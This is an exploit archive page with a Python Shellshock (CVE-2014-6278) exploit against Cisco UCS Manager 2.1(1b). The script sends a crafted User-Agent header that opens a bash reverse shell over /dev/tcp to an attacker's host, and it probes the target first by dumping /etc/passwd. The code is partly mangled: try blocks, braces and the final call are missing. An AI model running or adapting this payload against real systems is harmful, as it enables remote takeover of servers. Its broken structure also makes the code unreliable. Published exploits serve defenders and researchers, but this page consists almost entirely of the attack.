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Cisco UCS Manager 2.1(1b) Shellshock

Cisco UCS Manager 2.1(1b) Shellshock
Posted Mar 17, 2016
Authored by thatchriseckert

Cisco UCS Manager version 2.1(1b) shellshock exploit that spawns a connect-back shell.

tags | exploit, shell
systems | cisco
advisories | CVE-2014-6278
SHA-256 | 8e555e4314339995e576394135e468491a5591e41f42cc88f61d026cdbae0718

Cisco UCS Manager 2.1(1b) Shellshock

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# Cisco UCS Manager 2.1(1b) Shellshock Exploit
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory:
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert

import sys
import requests
import time

if len(sys.argv) < 4:
print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
print "[*]"
print "[*] Example: shellshock.py 4444"
print "[*] Listener: nc -lvp <port>"
print "\n"

#Disables request warning for cert validation ignore.
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
headers2 = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'

def exploit():
r = requests.get(url, headers=headers1, verify=False, timeout=5)
except Exception, e:
if 'timeout' in str(e):
print "[+] Success. Enjoy your shell..."
print "[-] Something is wrong..."
print "[-] Error: " + str(e)

def main():
r = requests.get(url, headers=headers2, verify=False, timeout=3)
if r.content.startswith('\nroot:'):
print "[+] Host is vulnerable, spawning shell..."
print "[-] Host is not vulnerable, quitting..."
except Exception, e:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)

if __name__ == "__main__":

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